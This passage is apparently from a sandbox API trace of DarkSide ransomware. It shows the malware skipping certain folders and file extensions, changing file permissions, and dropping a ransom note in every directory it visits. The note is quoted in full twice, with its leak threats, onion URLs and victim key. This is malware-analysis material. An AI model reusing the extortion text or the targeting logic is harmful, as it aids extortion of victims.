_Str2="sp6AE4NZCo52aGrKxD") returned -17 [0150.518] wcslen (_String="boot") returned 0x4 [0150.518] _wcsicmp (_Str1="google", _Str2="sp6AE4NZCo52aGrKxD") returned -12 [0150.518] wcslen (_String="google") returned 0x6 [0150.518] _wcsicmp (_Str1="mozilla", _Str2="sp6AE4NZCo52aGrKxD") returned -6 [0150.518] wcslen (_String="mozilla") returned 0x7 [0150.519] _wcsicmp (_Str1="program files", _Str2="sp6AE4NZCo52aGrKxD") returned -3 [0150.519] wcslen (_String="program files") returned 0xd [0150.519] _wcsicmp (_Str1="program files (x86)", _Str2="sp6AE4NZCo52aGrKxD") returned -3 [0150.519] wcslen (_String="program files (x86)") returned 0x13 [0150.519] _wcsicmp (_Str1="programdata", _Str2="sp6AE4NZCo52aGrKxD") returned -3 [0150.519] wcslen (_String="programdata") returned 0xb [0150.519] _wcsicmp (_Str1="system volume information", _Str2="sp6AE4NZCo52aGrKxD") returned 9 [0150.519] wcslen (_String="system volume information") returned 0x19 [0150.519] _wcsicmp (_Str1="tor browser", _Str2="sp6AE4NZCo52aGrKxD") returned 1 [0150.519] wcslen (_String="tor browser") returned 0xb [0150.519] _wcsicmp (_Str1="windows.old", _Str2="sp6AE4NZCo52aGrKxD") returned 4 [0150.519] wcslen (_String="windows.old") returned 0xb [0150.519] _wcsicmp (_Str1="intel", _Str2="sp6AE4NZCo52aGrKxD") returned -10 [0150.519] wcslen (_String="intel") returned 0x5 [0150.519] _wcsicmp (_Str1="msocache", _Str2="sp6AE4NZCo52aGrKxD") returned -6 [0150.519] wcslen (_String="msocache") returned 0x8 [0150.519] _wcsicmp (_Str1="perflogs", _Str2="sp6AE4NZCo52aGrKxD") returned -3 [0150.519] wcslen (_String="perflogs") returned 0x8 [0150.519] _wcsicmp (_Str1="x64dbg", _Str2="sp6AE4NZCo52aGrKxD") returned 5 [0150.519] wcslen (_String="x64dbg") returned 0x6 [0150.519] _wcsicmp (_Str1="public", _Str2="sp6AE4NZCo52aGrKxD") returned -3 [0150.519] wcslen (_String="public") returned 0x6 [0150.519] _wcsicmp (_Str1="all users", _Str2="sp6AE4NZCo52aGrKxD") returned -18 [0150.519] wcslen (_String="all users") returned 0x9 [0150.519] _wcsicmp (_Str1="default", _Str2="sp6AE4NZCo52aGrKxD") returned -15 [0150.519] wcslen (_String="default") returned 0x7 [0150.519] wcscpy (in: _Dest=0x44e0080, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\*" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\*" [0150.519] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\*") returned 0x35 [0150.519] wcscpy (in: _Dest=0x44e00e8, _Source="sp6AE4NZCo52aGrKxD" | out: _Dest="sp6AE4NZCo52aGrKxD") returned="sp6AE4NZCo52aGrKxD" [0150.519] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x4500090 [0150.519] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x4510098 [0150.520] wcscpy (in: _Dest=0x4500090, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD" [0150.520] GetNamedSecurityInfoW () returned 0x0 [0150.521] SetEntriesInAclW () returned 0x0 [0150.521] SetNamedSecurityInfoW () returned 0x0 [0150.532] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x2d57f18) returned 1 [0150.532] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3fe5bc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0150.532] SetCurrentDirectoryW (lpPathName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\4ytvpicjnjn\\sp6ae4nzco52agrkxd")) returned 1 [0150.532] strlen (_Str="----------- [ Welcome to DarkSide ] -------------> \r\n \r\n What happend? \r\n ---------------------------------------------- \r\n Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data. \r\n But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network. \r\n Follow our instructions below and you will recover all your data. \r\n \r\n Data Leak \r\n ---------------------------------------------- \r\n Dear Isolved, pay close attention to this message because it is very important. When penetrating your network, there was a global data leak from your servers. More 350Gb of DATA. Except that your network was fully encrypted. \r\n We have all the most important data from all your servers: Bases, E-mails, Accounting, Finance. If you do not get in touch within 72 hours, information about this incident will be posted on our blog, which is monitored by leading media in the U.S. and the world. \r\n \r\n Blog URL \r\n ---------------------------------------------- \r\n http://darksidedxcftmqa.onion/isolved/OLVrV9bQny0XcUSkk8y6cvFWox_2cRFUiz95xG-hYGKETYuH1rlnl2d5exhQ0jHu \r\n \r\n What guarantees? \r\n ---------------------------------------------- \r\n We value our reputation. If we do not do our work and liabilities, nobody will pay us. This is not in our interests. \r\n All our decryption software is perfectly tested and will decrypt your data. We will also provide support in case of problems. \r\n We guarantee to decrypt one file for free. Go to the site and contact us. \r\n \r\n How to get access on website? \r\n ---------------------------------------------- \r\n Using a TOR browser: \r\n 1) Download and install TOR browser from this site: https://torproject.org/ \r\n 2) Open our website: http://darksidfqzcuhtk2.onion/AZHT20L23HCABE7V5FLPMR50Y0LPCNWKLICOH3MP156YR8DTFJGUE935ZG0QYCT6 \r\n \r\n When you open our website, put the following data in the input form: \r\n Key: \r\n \r\n MDwY2fJ0wMOMksG1GCvkBclFQNBOoNOtoKM1UfDyDwuobpBZwC5VSc9Y3cd130WLEVnipGp6jBFSvhWyVQsa0J0ICcDu9ihtUQ5yYCtSPNWu0XNtNwXchonPQ0iMpRO0leoAYPOeLNbBNkz7xlWPAOBMSBKpVQn1if08n0xBOpY7xC8J9BFmbbkZutVMbLqVqGzF8Q31iGOIDpONYRDC6KQ1fZMZhHIiGXStZG8NtnZYvQQ94XKRhCuhWNfNh1SmyM0YPNMVAnslDpZLmveZmB1vNxinwAlMJj67lVkjwXQRdcRiemxRpX7gIx6zbuvkqtdYIBo1q3neaVNLyLxogP8b50tKxc0Uok1lxDfTsZ61wmNhbJiyh1FXvjgZGrvEuR2SGm5to0K6fIA8GIA8Viu2AhxUOafNcYSKXckS5hq0zYOXnITkTJFvStKKSOLzp39sYyPYmDkyIPPQUTGsoqCIti0Sb2BQFTGkQQeqvnhdTJZfzVKGobFXx0b2aWi1yYavjfLdOdVzVQJIVyeOYe610BOT4L4fRpO38eiAcwKuS1eRwskD2jP \r\n \r\n !!! DANGER !!! \r\n DO NOT MODIFY or try to RECOVER any files yourself. We WILL NOT be able to RESTORE them. \r\n !!! DANGER !!!") returned 0xa8f [0150.532] CreateFileW (lpFileName="README.c06622a1.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\4ytvpicjnjn\\sp6ae4nzco52agrkxd\\readme.c06622a1.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x678 [0150.534] WriteFile (in: hFile=0x678, lpBuffer=0x514f30*, nNumberOfBytesToWrite=0xa8f, lpNumberOfBytesWritten=0x3fe58c, lpOverlapped=0x0 | out: lpBuffer=0x514f30*, lpNumberOfBytesWritten=0x3fe58c*=0xa8f, lpOverlapped=0x0) returned 1 [0150.535] CloseHandle (hObject=0x678) returned 1 [0150.535] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0150.536] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\4ytvpicjnjn\\sp6ae4nzco52agrkxd")) returned 0x10 [0150.536] PathAddBackslashW (in: pszPath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD" | out: pszPath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\") returned="" [0150.536] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\") returned 0x47 [0150.536] FindFirstFileExW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\*", fInfoLevelId=0x0, lpFindFileData=0x3fe7ec, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3fe7ec) returned 0x2db87c0 [0150.536] FindNextFileW (in: hFindFile=0x2db87c0, lpFindFileData=0x3fe7ec | out: lpFindFileData=0x3fe7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9ec52730, ftCreationTime.dwHighDateTime=0x1d5e32a, ftLastAccessTime.dwLowDateTime=0xd856ba40, ftLastAccessTime.dwHighDateTime=0x1d6f256, ftLastWriteTime.dwLowDateTime=0xd856ba40, ftLastWriteTime.dwHighDateTime=0x1d6f256, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0150.537] FindNextFileW (in: hFindFile=0x2db87c0, lpFindFileData=0x3fe7ec | out: lpFindFileData=0x3fe7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x68025260, ftCreationTime.dwHighDateTime=0x1d5dc98, ftLastAccessTime.dwLowDateTime=0x87f3a790, ftLastAccessTime.dwHighDateTime=0x1d5dfb3, ftLastWriteTime.dwLowDateTime=0x87f3a790, ftLastWriteTime.dwHighDateTime=0x1d5dfb3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="fV7b28tZTM YqY0S", cAlternateFileName="FV7B28~1")) returned 1 [0150.537] _wcsicmp (_Str1="$recycle.bin", _Str2="fV7b28tZTM YqY0S") returned -66 [0150.537] wcslen (_String="$recycle.bin") returned 0xc [0150.537] _wcsicmp (_Str1="config.msi", _Str2="fV7b28tZTM YqY0S") returned -3 [0150.537] wcslen (_String="config.msi") returned 0xa [0150.537] _wcsicmp (_Str1="$windows.~bt", _Str2="fV7b28tZTM YqY0S") returned -66 [0150.537] wcslen (_String="$windows.~bt") returned 0xc [0150.537] _wcsicmp (_Str1="$windows.~ws", _Str2="fV7b28tZTM YqY0S") returned -66 [0150.537] wcslen (_String="$windows.~ws") returned 0xc [0150.537] _wcsicmp (_Str1="windows", _Str2="fV7b28tZTM YqY0S") returned 17 [0150.537] wcslen (_String="windows") returned 0x7 [0150.537] _wcsicmp (_Str1="appdata", _Str2="fV7b28tZTM YqY0S") returned -5 [0150.537] wcslen (_String="appdata") returned 0x7 [0150.537] _wcsicmp (_Str1="application data", _Str2="fV7b28tZTM YqY0S") returned -5 [0150.537] wcslen (_String="application data") returned 0x10 [0150.537] _wcsicmp (_Str1="boot", _Str2="fV7b28tZTM YqY0S") returned -4 [0150.537] wcslen (_String="boot") returned 0x4 [0150.537] _wcsicmp (_Str1="google", _Str2="fV7b28tZTM YqY0S") returned 1 [0150.537] wcslen (_String="google") returned 0x6 [0150.537] _wcsicmp (_Str1="mozilla", _Str2="fV7b28tZTM YqY0S") returned 7 [0150.537] wcslen (_String="mozilla") returned 0x7 [0150.537] _wcsicmp (_Str1="program files", _Str2="fV7b28tZTM YqY0S") returned 10 [0150.537] wcslen (_String="program files") returned 0xd [0150.538] _wcsicmp (_Str1="program files (x86)", _Str2="fV7b28tZTM YqY0S") returned 10 [0150.538] wcslen (_String="program files (x86)") returned 0x13 [0150.538] _wcsicmp (_Str1="programdata", _Str2="fV7b28tZTM YqY0S") returned 10 [0150.538] wcslen (_String="programdata") returned 0xb [0150.538] _wcsicmp (_Str1="system volume information", _Str2="fV7b28tZTM YqY0S") returned 13 [0150.538] wcslen (_String="system volume information") returned 0x19 [0150.538] _wcsicmp (_Str1="tor browser", _Str2="fV7b28tZTM YqY0S") returned 14 [0150.538] wcslen (_String="tor browser") returned 0xb [0150.538] _wcsicmp (_Str1="windows.old", _Str2="fV7b28tZTM YqY0S") returned 17 [0150.538] wcslen (_String="windows.old") returned 0xb [0150.538] _wcsicmp (_Str1="intel", _Str2="fV7b28tZTM YqY0S") returned 3 [0150.538] wcslen (_String="intel") returned 0x5 [0150.538] _wcsicmp (_Str1="msocache", _Str2="fV7b28tZTM YqY0S") returned 7 [0150.538] wcslen (_String="msocache") returned 0x8 [0150.538] _wcsicmp (_Str1="perflogs", _Str2="fV7b28tZTM YqY0S") returned 10 [0150.538] wcslen (_String="perflogs") returned 0x8 [0150.538] _wcsicmp (_Str1="x64dbg", _Str2="fV7b28tZTM YqY0S") returned 18 [0150.538] wcslen (_String="x64dbg") returned 0x6 [0150.538] _wcsicmp (_Str1="public", _Str2="fV7b28tZTM YqY0S") returned 10 [0150.538] wcslen (_String="public") returned 0x6 [0150.538] _wcsicmp (_Str1="all users", _Str2="fV7b28tZTM YqY0S") returned -5 [0150.538] wcslen (_String="all users") returned 0x9 [0150.538] _wcsicmp (_Str1="default", _Str2="fV7b28tZTM YqY0S") returned -2 [0150.538] wcslen (_String="default") returned 0x7 [0150.538] wcscpy (in: _Dest=0x4510098, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\*" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\*" [0150.538] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\*") returned 0x48 [0150.538] wcscpy (in: _Dest=0x4510126, _Source="fV7b28tZTM YqY0S" | out: _Dest="fV7b28tZTM YqY0S") returned="fV7b28tZTM YqY0S" [0150.538] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x45300a8 [0150.539] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x45400b0 [0150.540] wcscpy (in: _Dest=0x45300a8, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S" [0150.540] GetNamedSecurityInfoW () returned 0x0 [0150.540] SetEntriesInAclW () returned 0x0 [0150.541] SetNamedSecurityInfoW () returned 0x0 [0150.550] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x2d57fb8) returned 1 [0150.550] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3fe33c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0150.550] SetCurrentDirectoryW (lpPathName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\4ytvpicjnjn\\sp6ae4nzco52agrkxd\\fv7b28tztm yqy0s")) returned 1 [0150.550] strlen (_Str="----------- [ Welcome to DarkSide ] -------------> \r\n \r\n What happend? \r\n ---------------------------------------------- \r\n Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data. \r\n But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network. \r\n Follow our instructions below and you will recover all your data. \r\n \r\n Data Leak \r\n ---------------------------------------------- \r\n Dear Isolved, pay close attention to this message because it is very important. When penetrating your network, there was a global data leak from your servers. More 350Gb of DATA. Except that your network was fully encrypted. \r\n We have all the most important data from all your servers: Bases, E-mails, Accounting, Finance. If you do not get in touch within 72 hours, information about this incident will be posted on our blog, which is monitored by leading media in the U.S. and the world. \r\n \r\n Blog URL \r\n ---------------------------------------------- \r\n http://darksidedxcftmqa.onion/isolved/OLVrV9bQny0XcUSkk8y6cvFWox_2cRFUiz95xG-hYGKETYuH1rlnl2d5exhQ0jHu \r\n \r\n What guarantees? \r\n ---------------------------------------------- \r\n We value our reputation. If we do not do our work and liabilities, nobody will pay us. This is not in our interests. \r\n All our decryption software is perfectly tested and will decrypt your data. We will also provide support in case of problems. \r\n We guarantee to decrypt one file for free. Go to the site and contact us. \r\n \r\n How to get access on website? \r\n ---------------------------------------------- \r\n Using a TOR browser: \r\n 1) Download and install TOR browser from this site: https://torproject.org/ \r\n 2) Open our website: http://darksidfqzcuhtk2.onion/AZHT20L23HCABE7V5FLPMR50Y0LPCNWKLICOH3MP156YR8DTFJGUE935ZG0QYCT6 \r\n \r\n When you open our website, put the following data in the input form: \r\n Key: \r\n \r\n MDwY2fJ0wMOMksG1GCvkBclFQNBOoNOtoKM1UfDyDwuobpBZwC5VSc9Y3cd130WLEVnipGp6jBFSvhWyVQsa0J0ICcDu9ihtUQ5yYCtSPNWu0XNtNwXchonPQ0iMpRO0leoAYPOeLNbBNkz7xlWPAOBMSBKpVQn1if08n0xBOpY7xC8J9BFmbbkZutVMbLqVqGzF8Q31iGOIDpONYRDC6KQ1fZMZhHIiGXStZG8NtnZYvQQ94XKRhCuhWNfNh1SmyM0YPNMVAnslDpZLmveZmB1vNxinwAlMJj67lVkjwXQRdcRiemxRpX7gIx6zbuvkqtdYIBo1q3neaVNLyLxogP8b50tKxc0Uok1lxDfTsZ61wmNhbJiyh1FXvjgZGrvEuR2SGm5to0K6fIA8GIA8Viu2AhxUOafNcYSKXckS5hq0zYOXnITkTJFvStKKSOLzp39sYyPYmDkyIPPQUTGsoqCIti0Sb2BQFTGkQQeqvnhdTJZfzVKGobFXx0b2aWi1yYavjfLdOdVzVQJIVyeOYe610BOT4L4fRpO38eiAcwKuS1eRwskD2jP \r\n \r\n !!! DANGER !!! \r\n DO NOT MODIFY or try to RECOVER any files yourself. We WILL NOT be able to RESTORE them. \r\n !!! DANGER !!!") returned 0xa8f [0150.550] CreateFileW (lpFileName="README.c06622a1.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\4ytvpicjnjn\\sp6ae4nzco52agrkxd\\fv7b28tztm yqy0s\\readme.c06622a1.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x678 [0150.550] WriteFile (in: hFile=0x678, lpBuffer=0x514f30*, nNumberOfBytesToWrite=0xa8f, lpNumberOfBytesWritten=0x3fe30c, lpOverlapped=0x0 | out: lpBuffer=0x514f30*, lpNumberOfBytesWritten=0x3fe30c*=0xa8f, lpOverlapped=0x0) returned 1 [0150.551] CloseHandle (hObject=0x678) returned 1 [0150.552] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0150.552] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\4ytvpicjnjn\\sp6ae4nzco52agrkxd\\fv7b28tztm yqy0s")) returned 0x10 [0150.552] PathAddBackslashW (in: pszPath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S" | out: pszPath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\") returned="" [0150.552] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\") returned 0x58 [0150.552] FindFirstFileExW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\*", fInfoLevelId=0x0, lpFindFileData=0x3fe56c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3fe56c) returned 0x2db8800 [0150.552] FindNextFileW (in: hFindFile=0x2db8800, lpFindFileData=0x3fe56c | out: lpFindFileData=0x3fe56c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x68025260, ftCreationTime.dwHighDateTime=0x1d5dc98, ftLastAccessTime.dwLowDateTime=0xd8591ba0, ftLastAccessTime.dwHighDateTime=0x1d6f256, ftLastWriteTime.dwLowDateTime=0xd8591ba0, ftLastWriteTime.dwHighDateTime=0x1d6f256, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0150.553] FindNextFileW (in: hFindFile=0x2db8800, lpFindFileData=0x3fe56c | out: lpFindFileData=0x3fe56c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe0a5afd0, ftCreationTime.dwHighDateTime=0x1d5dbeb, ftLastAccessTime.dwLowDateTime=0x76914670, ftLastAccessTime.dwHighDateTime=0x1d5e2c3, ftLastWriteTime.dwLowDateTime=0x76914670, ftLastWriteTime.dwHighDateTime=0x1d5e2c3, nFileSizeHigh=0x0, nFileSizeLow=0x1611e, dwReserved0=0x0, dwReserved1=0x0, cFileName="58kutS-VZ_.m4a", cAlternateFileName="58KUTS~1.M4A")) returned 1 [0150.553] _wcsicmp (_Str1="58kutS-VZ_.m4a", _Str2="README.c06622a1.TXT") returned -61 [0150.553] wcsstr (_Str="58kutS-VZ_.m4a", _SubStr="README") returned 0x0 [0150.553] _wcsicmp (_Str1="autorun.inf", _Str2="58kutS-VZ_.m4a") returned 44 [0150.553] wcslen (_String="autorun.inf") returned 0xb [0150.553] _wcsicmp (_Str1="boot.ini", _Str2="58kutS-VZ_.m4a") returned 45 [0150.553] wcslen (_String="boot.ini") returned 0x8 [0150.553] _wcsicmp (_Str1="bootfont.bin", _Str2="58kutS-VZ_.m4a") returned 45 [0150.553] wcslen (_String="bootfont.bin") returned 0xc [0150.553] _wcsicmp (_Str1="bootsect.bak", _Str2="58kutS-VZ_.m4a") returned 45 [0150.553] wcslen (_String="bootsect.bak") returned 0xc [0150.553] _wcsicmp (_Str1="desktop.ini", _Str2="58kutS-VZ_.m4a") returned 47 [0150.553] wcslen (_String="desktop.ini") returned 0xb [0150.553] _wcsicmp (_Str1="iconcache.db", _Str2="58kutS-VZ_.m4a") returned 52 [0150.553] wcslen (_String="iconcache.db") returned 0xc [0150.553] _wcsicmp (_Str1="ntldr", _Str2="58kutS-VZ_.m4a") returned 57 [0150.553] wcslen (_String="ntldr") returned 0x5 [0150.553] _wcsicmp (_Str1="ntuser.dat", _Str2="58kutS-VZ_.m4a") returned 57 [0150.553] wcslen (_String="ntuser.dat") returned 0xa [0150.553] _wcsicmp (_Str1="ntuser.dat.log", _Str2="58kutS-VZ_.m4a") returned 57 [0150.553] wcslen (_String="ntuser.dat.log") returned 0xe [0150.554] _wcsicmp (_Str1="ntuser.ini", _Str2="58kutS-VZ_.m4a") returned 57 [0150.554] wcslen (_String="ntuser.ini") returned 0xa [0150.554] _wcsicmp (_Str1="thumbs.db", _Str2="58kutS-VZ_.m4a") returned 63 [0150.554] wcslen (_String="thumbs.db") returned 0x9 [0150.554] _wcsicmp (_Str1="386", _Str2="m4a") returned -58 [0150.554] wcslen (_String="386") returned 0x3 [0150.554] _wcsicmp (_Str1="adv", _Str2="m4a") returned -12 [0150.554] wcslen (_String="adv") returned 0x3 [0150.554] _wcsicmp (_Str1="ani", _Str2="m4a") returned -12 [0150.554] wcslen (_String="ani") returned 0x3 [0150.554] _wcsicmp (_Str1="bat", _Str2="m4a") returned -11 [0150.554] wcslen (_String="bat") returned 0x3 [0150.554] _wcsicmp (_Str1="bin", _Str2="m4a") returned -11 [0150.554] wcslen (_String="bin") returned 0x3 [0150.554] _wcsicmp (_Str1="cab", _Str2="m4a") returned -10 [0150.554] wcslen (_String="cab") returned 0x3 [0150.554] _wcsicmp (_Str1="cmd", _Str2="m4a") returned -10 [0150.554] wcslen (_String="cmd") returned 0x3 [0150.554] _wcsicmp (_Str1="com", _Str2="m4a") returned -10 [0150.554] wcslen (_String="com") returned 0x3 [0150.554] _wcsicmp (_Str1="cpl", _Str2="m4a") returned -10 [0150.565] wcslen (_String="cpl") returned 0x3 [0150.565] _wcsicmp (_Str1="cur", _Str2="m4a") returned -10 [0150.565] wcslen (_String="cur") returned 0x3 [0150.565] _wcsicmp (_Str1="deskthemepack", _Str2="m4a") returned -9 [0150.565] wcslen (_String="deskthemepack") returned 0xd [0150.565] _wcsicmp (_Str1="diagcab", _Str2="m4a") returned -9 [0150.565] wcslen (_String="diagcab") returned 0x7 [0150.565] _wcsicmp (_Str1="diagcfg", _Str2="m4a") returned -9 [0150.565] wcslen (_String="diagcfg") returned 0x7 [0150.565] _wcsicmp (_Str1="diagpkg", _Str2="m4a") returned -9 [0150.565] wcslen (_String="diagpkg") returned 0x7 [0150.565] _wcsicmp (_Str1="dll", _Str2="m4a") returned -9 [0150.565] wcslen (_String="dll") returned 0x3 [0150.565] _wcsicmp (_Str1="drv", _Str2="m4a") returned -9 [0150.566] wcslen (_String="drv") returned 0x3 [0150.566] _wcsicmp (_Str1="exe", _Str2="m4a") returned -8 [0150.566] wcslen (_String="exe") returned 0x3 [0150.566] _wcsicmp (_Str1="hlp", _Str2="m4a") returned -5 [0150.566] wcslen (_String="hlp") returned 0x3 [0150.566] _wcsicmp (_Str1="icl", _Str2="m4a") returned -4 [0150.566] wcslen (_String="icl") returned 0x3 [0150.566] _wcsicmp (_Str1="icns", _Str2="m4a") returned -4 [0150.566] wcslen (_String="icns") returned 0x4 [0150.566] _wcsicmp (_Str1="ico", _Str2="m4a") returned -4 [0150.566] wcslen (_String="ico") returned 0x3 [0150.566] _wcsicmp (_Str1="ics", _Str2="m4a") returned -4 [0150.566] wcslen (_String="ics") returned 0x3 [0150.566] _wcsicmp (_Str1="idx", _Str2="m4a") returned -4 [0150.566] wcslen (_String="idx") returned 0x3 [0150.566] _wcsicmp (_Str1="ldf", _Str2="m4a") returned -1 [0150.566] wcslen (_String="ldf") returned 0x3 [0150.566] _wcsicmp (_Str1="lnk", _Str2="m4a") returned -1 [0150.566] wcslen (_String="lnk") returned 0x3 [0150.566] _wcsicmp (_Str1="mod", _Str2="m4a") returned 59 [0150.566] wcslen (_String="mod") returned 0x3 [0150.566] _wcsicmp (_Str1="mpa", _Str2="m4a") returned 60 [0150.566] wcslen (_String="mpa") returned 0x3 [0150.566] _wcsicmp (_Str1="msc", _Str2="m4a") returned 63 [0150.566] wcslen (_String="msc") returned 0x3 [0150.566] _wcsicmp (_Str1="msp", _Str2="m4a") returned 63 [0150.566] wcslen (_String="msp") returned 0x3 [0150.566] _wcsicmp (_Str1="msstyles", _Str2="m4a") returned 63 [0150.566] wcslen (_String="msstyles") returned 0x8 [0150.566] _wcsicmp (_Str1="msu", _Str2="m4a") returned 63 [0150.566] wcslen (_String="msu") returned 0x3 [0150.566] _wcsicmp (_Str1="nls", _Str2="m4a") returned 1 [0150.566] wcslen (_String="nls") returned 0x3 [0150.566] _wcsicmp (_Str1="nomedia", _Str2="m4a") returned 1 [0150.566] wcslen (_String="nomedia") returned 0x7 [0150.566] _wcsicmp (_Str1="ocx", _Str2="m4a") returned 2 [0150.566] wcslen (_String="ocx") returned 0x3 [0150.567] _wcsicmp (_Str1="prf", _Str2="m4a") returned 3 [0150.567] wcslen (_String="prf") returned 0x3 [0150.567] _wcsicmp (_Str1="ps1", _Str2="m4a") returned 3 [0150.567] wcslen (_String="ps1") returned 0x3 [0150.567] _wcsicmp (_Str1="rom", _Str2="m4a") returned 5 [0150.567] wcslen (_String="rom") returned 0x3 [0150.567] _wcsicmp (_Str1="rtp", _Str2="m4a") returned 5 [0150.567] wcslen (_String="rtp") returned 0x3 [0150.567] 